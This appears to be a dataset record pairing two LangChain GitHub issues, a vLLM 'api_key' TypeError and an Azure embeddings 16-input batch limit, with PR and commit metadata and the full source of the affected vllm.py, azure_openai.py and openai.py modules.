~/softwares/miniconda3/envs/demo/lib/python3.9/site-packages/openai/_utils/_utils.py:299, in required_args.<locals>.inner.<locals>.wrapper(*args, **kwargs) 297 msg = f"Missing required argument: {quote(missing[0])}" 298 raise TypeError(msg) --> 299 return func(*args, **kwargs) TypeError: create() got an unexpected keyword argument 'api_key' ``` It seems that if I remove the line 158 from `langchain/llms/vllm.py`, the code is working. ### Expected behavior I expect a completion with no error.
https://github.com/langchain-ai/langchain/issues/13507
https://github.com/langchain-ai/langchain/pull/13517
6bc08266e0c9ca7841bb322259e69a9c0dd6a08d
69d39e2173fcb44cdcd334cb912acaf7b148dff6
"2023-11-17T08:56:07Z"
python
"2023-11-20T01:49:55Z"
libs/langchain/langchain/llms/vllm.py
from typing import Any, Dict, List, Optional from langchain.callbacks.manager import CallbackManagerForLLMRun from langchain.llms.base import BaseLLM from langchain.llms.openai import BaseOpenAI from langchain.pydantic_v1 import Field, root_validator from langchain.schema.output import Generation, LLMResult class VLLM(BaseLLM): """VLLM language model.""" model: str = "" """The name or path of a HuggingFace Transformers model.""" tensor_parallel_size: Optional[int] = 1 """The number of GPUs to use for distributed execution with tensor parallelism.""" trust_remote_code: Optional[bool] = False """Trust remote code (e.g., from HuggingFace) when downloading the model and tokenizer.""" n: int = 1 """Number of output sequences to return for the given prompt.""" best_of: Optional[int] = None """Number of output sequences that are generated from the prompt.""" presence_penalty: float = 0.0 """Float that penalizes new tokens based on whether they appear in the generated text so far""" frequency_penalty: float = 0.0 """Float that penalizes new tokens based on their frequency in the generated text so far""" temperature: float = 1.0 """Float that controls the randomness of the sampling.""" top_p: float = 1.0 """Float that controls the cumulative probability of the top tokens to consider.""" top_k: int = -1 """Integer that controls the number of top tokens to consider.""" use_beam_search: bool = False """Whether to use beam search instead of sampling.""" stop: Optional[List[str]] = None """List of strings that stop the generation when they are generated.""" ignore_eos: bool = False """Whether to ignore the EOS token and continue generating tokens after the EOS token is generated.""" max_new_tokens: int = 512 """Maximum number of tokens to generate per output sequence.""" logprobs: Optional[int] = None """Number of log probabilities to return per output token.""" dtype: str = "auto" """The data type for the model weights and activations.""" download_dir: Optional[str] = None """Directory to download and load the weights. (Default to the default cache dir of huggingface)""" vllm_kwargs: Dict[str, Any] = Field(default_factory=dict) """Holds any model parameters valid for `vllm.LLM` call not explicitly specified.""" client: Any #: :meta private: @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that python package exists in environment.""" try: from vllm import LLM as VLLModel except ImportError: raise ImportError( "Could not import vllm python package. " "Please install it with `pip install vllm`." 
) values["client"] = VLLModel( model=values["model"], tensor_parallel_size=values["tensor_parallel_size"], trust_remote_code=values["trust_remote_code"], dtype=values["dtype"], download_dir=values["download_dir"], **values["vllm_kwargs"], ) return values @property def _default_params(self) -> Dict[str, Any]: """Get the default parameters for calling vllm.""" return { "n": self.n, "best_of": self.best_of, "max_tokens": self.max_new_tokens, "top_k": self.top_k, "top_p": self.top_p, "temperature": self.temperature, "presence_penalty": self.presence_penalty, "frequency_penalty": self.frequency_penalty, "stop": self.stop, "ignore_eos": self.ignore_eos, "use_beam_search": self.use_beam_search, "logprobs": self.logprobs, } def _generate( self, prompts: List[str], stop: Optional[List[str]] = None, run_manager: Optional[CallbackManagerForLLMRun] = None, **kwargs: Any, ) -> LLMResult: """Run the LLM on the given prompt and input.""" from vllm import SamplingParams # build sampling parameters params = {**self._default_params, **kwargs, "stop": stop} sampling_params = SamplingParams(**params) # call the model outputs = self.client.generate(prompts, sampling_params) generations = [] for output in outputs: text = output.outputs[0].text generations.append([Generation(text=text)]) return LLMResult(generations=generations) @property def _llm_type(self) -> str: """Return type of llm.""" return "vllm" class VLLMOpenAI(BaseOpenAI): """vLLM OpenAI-compatible API client""" @property def _invocation_params(self) -> Dict[str, Any]: """Get the parameters used to invoke the model.""" openai_creds: Dict[str, Any] = { "api_key": self.openai_api_key, "api_base": self.openai_api_base, } return { "model": self.model_name, **openai_creds, **self._default_params, "logit_bias": None, } @property def _llm_type(self) -> str: """Return type of llm.""" return "vllm-openai"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
13,539
New update broke embeddings models
### System Info LangChain version: 0.0.337 Python version: 3.10.13 ### Who can help? _No response_ ### Information - [ ] The official example notebooks/scripts - [X] My own modified scripts ### Related Components - [ ] LLMs/Chat Models - [X] Embedding Models - [ ] Prompts / Prompt Templates / Prompt Selectors - [ ] Output Parsers - [ ] Document Loaders - [X] Vector Stores / Retrievers - [ ] Memory - [ ] Agents / Agent Executors - [ ] Tools / Toolkits - [ ] Chains - [ ] Callbacks/Tracing - [ ] Async ### Reproduction db = Chroma.from_documents(docs, AzureOpenAIEmbeddings()) ### Expected behavior This worked on previous versions of LangChain using OpenAIEmbeddings(), but now I get this error BadRequestError: Error code: 400 - {'error': {'message': 'Too many inputs. The max number of inputs is 16. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.', 'type': 'invalid_request_error', 'param': None, 'code': None}}
https://github.com/langchain-ai/langchain/issues/13539
https://github.com/langchain-ai/langchain/pull/13425
e53f59f01a2d5020e4a3248380d7a04891c8be1f
6bf9b2cb51f94872bb251ba22fe7e3aefb753d43
"2023-11-17T21:47:33Z"
python
"2023-11-20T02:34:51Z"
libs/langchain/langchain/embeddings/azure_openai.py
"""Azure OpenAI embeddings wrapper.""" from __future__ import annotations import os import warnings from typing import Dict, Optional, Union from langchain.embeddings.openai import OpenAIEmbeddings from langchain.pydantic_v1 import Field, root_validator from langchain.utils import get_from_dict_or_env from langchain.utils.openai import is_openai_v1 class AzureOpenAIEmbeddings(OpenAIEmbeddings): """`Azure OpenAI` Embeddings API.""" azure_endpoint: Union[str, None] = None """Your Azure endpoint, including the resource. Automatically inferred from env var `AZURE_OPENAI_ENDPOINT` if not provided. Example: `https://example-resource.azure.openai.com/` """ deployment: Optional[str] = Field(default=None, alias="azure_deployment") """A model deployment. If given sets the base client URL to include `/deployments/{azure_deployment}`. Note: this means you won't be able to use non-deployment endpoints. """ openai_api_key: Union[str, None] = Field(default=None, alias="api_key") """Automatically inferred from env var `AZURE_OPENAI_API_KEY` if not provided.""" azure_ad_token: Union[str, None] = None """Your Azure Active Directory token. Automatically inferred from env var `AZURE_OPENAI_AD_TOKEN` if not provided. For more: https://www.microsoft.com/en-us/security/business/identity-access/microsoft-entra-id. """ # noqa: E501 azure_ad_token_provider: Union[str, None] = None """A function that returns an Azure Active Directory token. Will be invoked on every request. """ openai_api_version: Optional[str] = Field(default=None, alias="api_version") """Automatically inferred from env var `OPENAI_API_VERSION` if not provided.""" validate_base_url: bool = True @root_validator() def validate_environment(cls, values: Dict) -> Dict: """Validate that api key and python package exists in environment.""" # Check OPENAI_KEY for backwards compatibility. # TODO: Remove OPENAI_API_KEY support to avoid possible conflict when using # other forms of azure credentials. values["openai_api_key"] = ( values["openai_api_key"] or os.getenv("AZURE_OPENAI_API_KEY") or os.getenv("OPENAI_API_KEY") ) values["openai_api_base"] = values["openai_api_base"] or os.getenv( "OPENAI_API_BASE" ) values["openai_api_version"] = values["openai_api_version"] or os.getenv( "OPENAI_API_VERSION", default="2023-05-15" ) values["openai_api_type"] = get_from_dict_or_env( values, "openai_api_type", "OPENAI_API_TYPE", default="azure" ) values["openai_organization"] = ( values["openai_organization"] or os.getenv("OPENAI_ORG_ID") or os.getenv("OPENAI_ORGANIZATION") ) values["openai_proxy"] = get_from_dict_or_env( values, "openai_proxy", "OPENAI_PROXY", default="", ) values["azure_endpoint"] = values["azure_endpoint"] or os.getenv( "AZURE_OPENAI_ENDPOINT" ) values["azure_ad_token"] = values["azure_ad_token"] or os.getenv( "AZURE_OPENAI_AD_TOKEN" ) try: import openai except ImportError: raise ImportError( "Could not import openai python package. " "Please install it with `pip install openai`." ) if is_openai_v1(): # For backwards compatibility. Before openai v1, no distinction was made # between azure_endpoint and base_url (openai_api_base). openai_api_base = values["openai_api_base"] if openai_api_base and values["validate_base_url"]: if "/openai" not in openai_api_base: values["openai_api_base"] += "/openai" warnings.warn( "As of openai>=1.0.0, Azure endpoints should be specified via " f"the `azure_endpoint` param not `openai_api_base` " f"(or alias `base_url`). Updating `openai_api_base` from " f"{openai_api_base} to {values['openai_api_base']}." 
) if values["deployment"]: warnings.warn( "As of openai>=1.0.0, if `deployment` (or alias " "`azure_deployment`) is specified then " "`openai_api_base` (or alias `base_url`) should not be. " "Instead use `deployment` (or alias `azure_deployment`) " "and `azure_endpoint`." ) if values["deployment"] not in values["openai_api_base"]: warnings.warn( "As of openai>=1.0.0, if `openai_api_base` " "(or alias `base_url`) is specified it is expected to be " "of the form " "https://example-resource.azure.openai.com/openai/deployments/example-deployment. " # noqa: E501 f"Updating {openai_api_base} to " f"{values['openai_api_base']}." ) values["openai_api_base"] += ( "/deployments/" + values["deployment"] ) values["deployment"] = None client_params = { "api_version": values["openai_api_version"], "azure_endpoint": values["azure_endpoint"], "azure_deployment": values["deployment"], "api_key": values["openai_api_key"], "azure_ad_token": values["azure_ad_token"], "azure_ad_token_provider": values["azure_ad_token_provider"], "organization": values["openai_organization"], "base_url": values["openai_api_base"], "timeout": values["request_timeout"], "max_retries": values["max_retries"], "default_headers": values["default_headers"], "default_query": values["default_query"], "http_client": values["http_client"], } values["client"] = openai.AzureOpenAI(**client_params).embeddings values["async_client"] = openai.AsyncAzureOpenAI(**client_params).embeddings else: values["client"] = openai.Embedding return values @property def _llm_type(self) -> str: return "azure-openai-chat"
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
13,539
New update broke embeddings models
### System Info

LangChain version: 0.0.337
Python version: 3.10.13

### Who can help?

_No response_

### Information

- [ ] The official example notebooks/scripts
- [X] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

db = Chroma.from_documents(docs, AzureOpenAIEmbeddings())

### Expected behavior

This worked on previous versions of LangChain using OpenAIEmbeddings(), but now I get this error:

BadRequestError: Error code: 400 - {'error': {'message': 'Too many inputs. The max number of inputs is 16. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.', 'type': 'invalid_request_error', 'param': None, 'code': None}}
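
A hedged workaround sketch for the error above (not from the issue itself): `chunk_size` on the embeddings wrapper is the number of texts sent per request, so capping it at Azure's documented limit of 16 keeps each call under the quota. The `docs` variable and the Chroma dependency are assumed as in the reproduction; placeholder documents stand in here so the snippet is self-contained:

from langchain.embeddings import AzureOpenAIEmbeddings
from langchain.schema import Document
from langchain.vectorstores import Chroma

# Placeholder documents standing in for `docs` from the reproduction above.
docs = [Document(page_content=f"example text {i}") for i in range(100)]

# Azure's embeddings endpoint accepts at most 16 inputs per request, so cap
# the wrapper's per-request batch size accordingly.
db = Chroma.from_documents(docs, AzureOpenAIEmbeddings(chunk_size=16))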
https://github.com/langchain-ai/langchain/issues/13539
https://github.com/langchain-ai/langchain/pull/13425
e53f59f01a2d5020e4a3248380d7a04891c8be1f
6bf9b2cb51f94872bb251ba22fe7e3aefb753d43
"2023-11-17T21:47:33Z"
python
"2023-11-20T02:34:51Z"
libs/langchain/langchain/embeddings/openai.py
from __future__ import annotations

import logging
import os
import warnings
from importlib.metadata import version
from typing import (
    Any,
    Callable,
    Dict,
    List,
    Literal,
    Mapping,
    Optional,
    Sequence,
    Set,
    Tuple,
    Union,
    cast,
)

import numpy as np
from packaging.version import Version, parse
from tenacity import (
    AsyncRetrying,
    before_sleep_log,
    retry,
    retry_if_exception_type,
    stop_after_attempt,
    wait_exponential,
)

from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names

logger = logging.getLogger(__name__)


def _create_retry_decorator(embeddings: OpenAIEmbeddings) -> Callable[[Any], Any]:
    import openai

    min_seconds = 4
    max_seconds = 10
    # Wait 2^x * 1 second between each retry starting with
    # 4 seconds, then up to 10 seconds, then 10 seconds afterwards
    return retry(
        reraise=True,
        stop=stop_after_attempt(embeddings.max_retries),
        wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
        retry=(
            retry_if_exception_type(openai.error.Timeout)
            | retry_if_exception_type(openai.error.APIError)
            | retry_if_exception_type(openai.error.APIConnectionError)
            | retry_if_exception_type(openai.error.RateLimitError)
            | retry_if_exception_type(openai.error.ServiceUnavailableError)
        ),
        before_sleep=before_sleep_log(logger, logging.WARNING),
    )


def _async_retry_decorator(embeddings: OpenAIEmbeddings) -> Any:
    import openai

    min_seconds = 4
    max_seconds = 10
    # Wait 2^x * 1 second between each retry starting with
    # 4 seconds, then up to 10 seconds, then 10 seconds afterwards
    async_retrying = AsyncRetrying(
        reraise=True,
        stop=stop_after_attempt(embeddings.max_retries),
        wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
        retry=(
            retry_if_exception_type(openai.error.Timeout)
            | retry_if_exception_type(openai.error.APIError)
            | retry_if_exception_type(openai.error.APIConnectionError)
            | retry_if_exception_type(openai.error.RateLimitError)
            | retry_if_exception_type(openai.error.ServiceUnavailableError)
        ),
        before_sleep=before_sleep_log(logger, logging.WARNING),
    )

    def wrap(func: Callable) -> Callable:
        async def wrapped_f(*args: Any, **kwargs: Any) -> Callable:
            async for _ in async_retrying:
                return await func(*args, **kwargs)
            raise AssertionError("this is unreachable")

        return wrapped_f

    return wrap


# https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings
def _check_response(response: dict, skip_empty: bool = False) -> dict:
    if any(len(d["embedding"]) == 1 for d in response["data"]) and not skip_empty:
        import openai

        raise openai.error.APIError("OpenAI API returned an empty embedding")
    return response


def embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
    """Use tenacity to retry the embedding call."""
    if _is_openai_v1():
        return embeddings.client.create(**kwargs)
    retry_decorator = _create_retry_decorator(embeddings)

    @retry_decorator
    def _embed_with_retry(**kwargs: Any) -> Any:
        response = embeddings.client.create(**kwargs)
        return _check_response(response, skip_empty=embeddings.skip_empty)

    return _embed_with_retry(**kwargs)


async def async_embed_with_retry(embeddings: OpenAIEmbeddings, **kwargs: Any) -> Any:
    """Use tenacity to retry the embedding call."""
    if _is_openai_v1():
        return await embeddings.async_client.create(**kwargs)

    @_async_retry_decorator(embeddings)
    async def _async_embed_with_retry(**kwargs: Any) -> Any:
        response = await embeddings.client.acreate(**kwargs)
        return _check_response(response, skip_empty=embeddings.skip_empty)

    return await _async_embed_with_retry(**kwargs)


def _is_openai_v1() -> bool:
    _version = parse(version("openai"))
    return _version >= Version("1.0.0")


class OpenAIEmbeddings(BaseModel, Embeddings):
    """OpenAI embedding models.

    To use, you should have the ``openai`` python package installed, and the
    environment variable ``OPENAI_API_KEY`` set with your API key or pass it
    as a named parameter to the constructor.

    Example:
        .. code-block:: python

            from langchain.embeddings import OpenAIEmbeddings
            openai = OpenAIEmbeddings(openai_api_key="my-api-key")

    In order to use the library with Microsoft Azure endpoints, you need to set
    the OPENAI_API_TYPE, OPENAI_API_BASE, OPENAI_API_KEY and OPENAI_API_VERSION.
    The OPENAI_API_TYPE must be set to 'azure' and the others correspond to
    the properties of your endpoint.
    In addition, the deployment name must be passed as the model parameter.

    Example:
        .. code-block:: python

            import os

            os.environ["OPENAI_API_TYPE"] = "azure"
            os.environ["OPENAI_API_BASE"] = "https://<your-endpoint.openai.azure.com/"
            os.environ["OPENAI_API_KEY"] = "your AzureOpenAI key"
            os.environ["OPENAI_API_VERSION"] = "2023-05-15"
            os.environ["OPENAI_PROXY"] = "http://your-corporate-proxy:8080"

            from langchain.embeddings.openai import OpenAIEmbeddings
            embeddings = OpenAIEmbeddings(
                deployment="your-embeddings-deployment-name",
                model="your-embeddings-model-name",
                openai_api_base="https://your-endpoint.openai.azure.com/",
                openai_api_type="azure",
            )
            text = "This is a test query."
            query_result = embeddings.embed_query(text)

    """

    client: Any = Field(default=None, exclude=True)  #: :meta private:
    async_client: Any = Field(default=None, exclude=True)  #: :meta private:
    model: str = "text-embedding-ada-002"
    # to support Azure OpenAI Service custom deployment names
    deployment: Optional[str] = model
    # TODO: Move to AzureOpenAIEmbeddings.
    openai_api_version: Optional[str] = Field(default=None, alias="api_version")
    """Automatically inferred from env var `OPENAI_API_VERSION` if not provided."""
    # to support Azure OpenAI Service custom endpoints
    openai_api_base: Optional[str] = Field(default=None, alias="base_url")
    """Base URL path for API requests, leave blank if not using a proxy or service
        emulator."""
    # to support Azure OpenAI Service custom endpoints
    openai_api_type: Optional[str] = None
    # to support explicit proxy for OpenAI
    openai_proxy: Optional[str] = None
    embedding_ctx_length: int = 8191
    """The maximum number of tokens to embed at once."""
    openai_api_key: Optional[str] = Field(default=None, alias="api_key")
    """Automatically inferred from env var `OPENAI_API_KEY` if not provided."""
    openai_organization: Optional[str] = Field(default=None, alias="organization")
    """Automatically inferred from env var `OPENAI_ORG_ID` if not provided."""
    allowed_special: Union[Literal["all"], Set[str]] = set()
    disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all"
    chunk_size: int = 1000
    """Maximum number of texts to embed in each batch"""
    max_retries: int = 2
    """Maximum number of retries to make when generating."""
    request_timeout: Optional[Union[float, Tuple[float, float], Any]] = Field(
        default=None, alias="timeout"
    )
    """Timeout for requests to OpenAI completion API. Can be float, httpx.Timeout or
        None."""
    headers: Any = None
    tiktoken_model_name: Optional[str] = None
    """The model name to pass to tiktoken when using this class.
    Tiktoken is used to count the number of tokens in documents to constrain
    them to be under a certain limit. By default, when set to None, this will
    be the same as the embedding model name. However, there are some cases
    where you may want to use this Embedding class with a model name not
    supported by tiktoken. This can include when using Azure embeddings or
    when using one of the many model providers that expose an OpenAI-like
    API but with different models. In those cases, in order to avoid erroring
    when tiktoken is called, you can specify a model name to use here."""
    show_progress_bar: bool = False
    """Whether to show a progress bar when embedding."""
    model_kwargs: Dict[str, Any] = Field(default_factory=dict)
    """Holds any model parameters valid for `create` call not explicitly specified."""
    skip_empty: bool = False
    """Whether to skip empty strings when embedding or raise an error.
    Defaults to not skipping."""
    default_headers: Union[Mapping[str, str], None] = None
    default_query: Union[Mapping[str, object], None] = None
    # Configure a custom httpx client. See the
    # [httpx documentation](https://www.python-httpx.org/api/#client) for more details.
    http_client: Union[Any, None] = None
    """Optional httpx.Client."""

    class Config:
        """Configuration for this pydantic object."""

        extra = Extra.forbid
        allow_population_by_field_name = True

    @root_validator(pre=True)
    def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
        """Build extra kwargs from additional params that were passed in."""
        all_required_field_names = get_pydantic_field_names(cls)
        extra = values.get("model_kwargs", {})
        for field_name in list(values):
            if field_name in extra:
                raise ValueError(f"Found {field_name} supplied twice.")
            if field_name not in all_required_field_names:
                warnings.warn(
                    f"""WARNING! {field_name} is not default parameter.
                    {field_name} was transferred to model_kwargs.
                    Please confirm that {field_name} is what you intended."""
                )
                extra[field_name] = values.pop(field_name)

        invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
        if invalid_model_kwargs:
            raise ValueError(
                f"Parameters {invalid_model_kwargs} should be specified explicitly. "
                f"Instead they were passed in as part of `model_kwargs` parameter."
            )

        values["model_kwargs"] = extra
        return values

    @root_validator()
    def validate_environment(cls, values: Dict) -> Dict:
        """Validate that api key and python package exists in environment."""
        values["openai_api_key"] = get_from_dict_or_env(
            values, "openai_api_key", "OPENAI_API_KEY"
        )
        values["openai_api_base"] = values["openai_api_base"] or os.getenv(
            "OPENAI_API_BASE"
        )
        values["openai_api_type"] = get_from_dict_or_env(
            values,
            "openai_api_type",
            "OPENAI_API_TYPE",
            default="",
        )
        values["openai_proxy"] = get_from_dict_or_env(
            values,
            "openai_proxy",
            "OPENAI_PROXY",
            default="",
        )
        if values["openai_api_type"] in ("azure", "azure_ad", "azuread"):
            default_api_version = "2023-05-15"
            # Azure OpenAI embedding models allow a maximum of 16 texts
            # at a time in each batch
            # See: https://learn.microsoft.com/en-us/azure/ai-services/openai/reference#embeddings
            values["chunk_size"] = min(values["chunk_size"], 16)
        else:
            default_api_version = ""
        values["openai_api_version"] = get_from_dict_or_env(
            values,
            "openai_api_version",
            "OPENAI_API_VERSION",
            default=default_api_version,
        )
        # Check OPENAI_ORGANIZATION for backwards compatibility.
        values["openai_organization"] = (
            values["openai_organization"]
            or os.getenv("OPENAI_ORG_ID")
            or os.getenv("OPENAI_ORGANIZATION")
        )
        try:
            import openai
        except ImportError:
            raise ImportError(
                "Could not import openai python package. "
                "Please install it with `pip install openai`."
            )
        else:
            if _is_openai_v1():
                if values["openai_api_type"] in ("azure", "azure_ad", "azuread"):
                    warnings.warn(
                        "If you have openai>=1.0.0 installed and are using Azure, "
                        "please use the `AzureOpenAIEmbeddings` class."
                    )
                client_params = {
                    "api_key": values["openai_api_key"],
                    "organization": values["openai_organization"],
                    "base_url": values["openai_api_base"],
                    "timeout": values["request_timeout"],
                    "max_retries": values["max_retries"],
                    "default_headers": values["default_headers"],
                    "default_query": values["default_query"],
                    "http_client": values["http_client"],
                }
                if not values.get("client"):
                    values["client"] = openai.OpenAI(**client_params).embeddings
                if not values.get("async_client"):
                    values["async_client"] = openai.AsyncOpenAI(
                        **client_params
                    ).embeddings
            elif not values.get("client"):
                values["client"] = openai.Embedding
            else:
                pass
        return values

    @property
    def _invocation_params(self) -> Dict[str, Any]:
        if _is_openai_v1():
            openai_args: Dict = {"model": self.model, **self.model_kwargs}
        else:
            openai_args = {
                "model": self.model,
                "request_timeout": self.request_timeout,
                "headers": self.headers,
                "api_key": self.openai_api_key,
                "organization": self.openai_organization,
                "api_base": self.openai_api_base,
                "api_type": self.openai_api_type,
                "api_version": self.openai_api_version,
                **self.model_kwargs,
            }
            if self.openai_api_type in ("azure", "azure_ad", "azuread"):
                openai_args["engine"] = self.deployment
            # TODO: Look into proxy with openai v1.
            if self.openai_proxy:
                try:
                    import openai
                except ImportError:
                    raise ImportError(
                        "Could not import openai python package. "
                        "Please install it with `pip install openai`."
                    )

                openai.proxy = {
                    "http": self.openai_proxy,
                    "https": self.openai_proxy,
                }  # type: ignore[assignment]  # noqa: E501
        return openai_args

    # please refer to
    # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb
    def _get_len_safe_embeddings(
        self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
    ) -> List[List[float]]:
        embeddings: List[List[float]] = [[] for _ in range(len(texts))]
        try:
            import tiktoken
        except ImportError:
            raise ImportError(
                "Could not import tiktoken python package. "
                "This is needed in order to for OpenAIEmbeddings. "
                "Please install it with `pip install tiktoken`."
            )

        tokens = []
        indices = []
        model_name = self.tiktoken_model_name or self.model
        try:
            encoding = tiktoken.encoding_for_model(model_name)
        except KeyError:
            logger.warning("Warning: model not found. Using cl100k_base encoding.")
            model = "cl100k_base"
            encoding = tiktoken.get_encoding(model)
        for i, text in enumerate(texts):
            if self.model.endswith("001"):
                # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
                # replace newlines, which can negatively affect performance.
                text = text.replace("\n", " ")
            token = encoding.encode(
                text,
                allowed_special=self.allowed_special,
                disallowed_special=self.disallowed_special,
            )
            for j in range(0, len(token), self.embedding_ctx_length):
                tokens.append(token[j : j + self.embedding_ctx_length])
                indices.append(i)

        batched_embeddings: List[List[float]] = []
        _chunk_size = chunk_size or self.chunk_size

        if self.show_progress_bar:
            try:
                from tqdm.auto import tqdm

                _iter = tqdm(range(0, len(tokens), _chunk_size))
            except ImportError:
                _iter = range(0, len(tokens), _chunk_size)
        else:
            _iter = range(0, len(tokens), _chunk_size)

        for i in _iter:
            response = embed_with_retry(
                self,
                input=tokens[i : i + _chunk_size],
                **self._invocation_params,
            )
            if not isinstance(response, dict):
                response = response.dict()
            batched_embeddings.extend(r["embedding"] for r in response["data"])

        results: List[List[List[float]]] = [[] for _ in range(len(texts))]
        num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
        for i in range(len(indices)):
            if self.skip_empty and len(batched_embeddings[i]) == 1:
                continue
            results[indices[i]].append(batched_embeddings[i])
            num_tokens_in_batch[indices[i]].append(len(tokens[i]))

        for i in range(len(texts)):
            _result = results[i]
            if len(_result) == 0:
                average_embedded = embed_with_retry(
                    self,
                    input="",
                    **self._invocation_params,
                )
                if not isinstance(average_embedded, dict):
                    average_embedded = average_embedded.dict()
                average = average_embedded["data"][0]["embedding"]
            else:
                average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
            embeddings[i] = (average / np.linalg.norm(average)).tolist()

        return embeddings

    # please refer to
    # https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb
    async def _aget_len_safe_embeddings(
        self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
    ) -> List[List[float]]:
        embeddings: List[List[float]] = [[] for _ in range(len(texts))]
        try:
            import tiktoken
        except ImportError:
            raise ImportError(
                "Could not import tiktoken python package. "
                "This is needed in order to for OpenAIEmbeddings. "
                "Please install it with `pip install tiktoken`."
            )

        tokens = []
        indices = []
        model_name = self.tiktoken_model_name or self.model
        try:
            encoding = tiktoken.encoding_for_model(model_name)
        except KeyError:
            logger.warning("Warning: model not found. Using cl100k_base encoding.")
            model = "cl100k_base"
            encoding = tiktoken.get_encoding(model)
        for i, text in enumerate(texts):
            if self.model.endswith("001"):
                # See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
                # replace newlines, which can negatively affect performance.
                text = text.replace("\n", " ")
            token = encoding.encode(
                text,
                allowed_special=self.allowed_special,
                disallowed_special=self.disallowed_special,
            )
            for j in range(0, len(token), self.embedding_ctx_length):
                tokens.append(token[j : j + self.embedding_ctx_length])
                indices.append(i)

        batched_embeddings: List[List[float]] = []
        _chunk_size = chunk_size or self.chunk_size
        for i in range(0, len(tokens), _chunk_size):
            response = await async_embed_with_retry(
                self,
                input=tokens[i : i + _chunk_size],
                **self._invocation_params,
            )
            if not isinstance(response, dict):
                response = response.dict()
            batched_embeddings.extend(r["embedding"] for r in response["data"])

        results: List[List[List[float]]] = [[] for _ in range(len(texts))]
        num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
        for i in range(len(indices)):
            results[indices[i]].append(batched_embeddings[i])
            num_tokens_in_batch[indices[i]].append(len(tokens[i]))

        for i in range(len(texts)):
            _result = results[i]
            if len(_result) == 0:
                average_embedded = embed_with_retry(
                    self,
                    input="",
                    **self._invocation_params,
                )
                if not isinstance(average_embedded, dict):
                    average_embedded = average_embedded.dict()
                average = average_embedded["data"][0]["embedding"]
            else:
                average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
            embeddings[i] = (average / np.linalg.norm(average)).tolist()

        return embeddings

    def embed_documents(
        self, texts: List[str], chunk_size: Optional[int] = 0
    ) -> List[List[float]]:
        """Call out to OpenAI's embedding endpoint for embedding search docs.

        Args:
            texts: The list of texts to embed.
            chunk_size: The chunk size of embeddings. If None, will use the chunk
                size specified by the class.

        Returns:
            List of embeddings, one for each text.
        """
        # NOTE: to keep things simple, we assume the list may contain texts longer
        #       than the maximum context and use length-safe embedding function.
        engine = cast(str, self.deployment)
        return self._get_len_safe_embeddings(texts, engine=engine)

    async def aembed_documents(
        self, texts: List[str], chunk_size: Optional[int] = 0
    ) -> List[List[float]]:
        """Call out to OpenAI's embedding endpoint async for embedding search docs.

        Args:
            texts: The list of texts to embed.
            chunk_size: The chunk size of embeddings. If None, will use the chunk
                size specified by the class.

        Returns:
            List of embeddings, one for each text.
        """
        # NOTE: to keep things simple, we assume the list may contain texts longer
        #       than the maximum context and use length-safe embedding function.
        engine = cast(str, self.deployment)
        return await self._aget_len_safe_embeddings(texts, engine=engine)

    def embed_query(self, text: str) -> List[float]:
        """Call out to OpenAI's embedding endpoint for embedding query text.

        Args:
            text: The text to embed.

        Returns:
            Embedding for the text.
        """
        return self.embed_documents([text])[0]

    async def aembed_query(self, text: str) -> List[float]:
        """Call out to OpenAI's embedding endpoint async for embedding query text.

        Args:
            text: The text to embed.

        Returns:
            Embedding for the text.
        """
        embeddings = await self.aembed_documents([text])
        return embeddings[0]
closed
langchain-ai/langchain
https://github.com/langchain-ai/langchain
13,539
New update broke embeddings models
### System Info

LangChain version: 0.0.337
Python version: 3.10.13

### Who can help?

_No response_

### Information

- [ ] The official example notebooks/scripts
- [X] My own modified scripts

### Related Components

- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [X] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async

### Reproduction

db = Chroma.from_documents(docs, AzureOpenAIEmbeddings())

### Expected behavior

This worked on previous versions of LangChain using OpenAIEmbeddings(), but now I get this error:

BadRequestError: Error code: 400 - {'error': {'message': 'Too many inputs. The max number of inputs is 16. We hope to increase the number of inputs per request soon. Please contact us through an Azure support request at: https://go.microsoft.com/fwlink/?linkid=2213926 for further questions.', 'type': 'invalid_request_error', 'param': None, 'code': None}}
https://github.com/langchain-ai/langchain/issues/13539
https://github.com/langchain-ai/langchain/pull/13425
e53f59f01a2d5020e4a3248380d7a04891c8be1f
6bf9b2cb51f94872bb251ba22fe7e3aefb753d43
"2023-11-17T21:47:33Z"
python
"2023-11-20T02:34:51Z"
libs/langchain/tests/integration_tests/embeddings/test_azure_openai.py
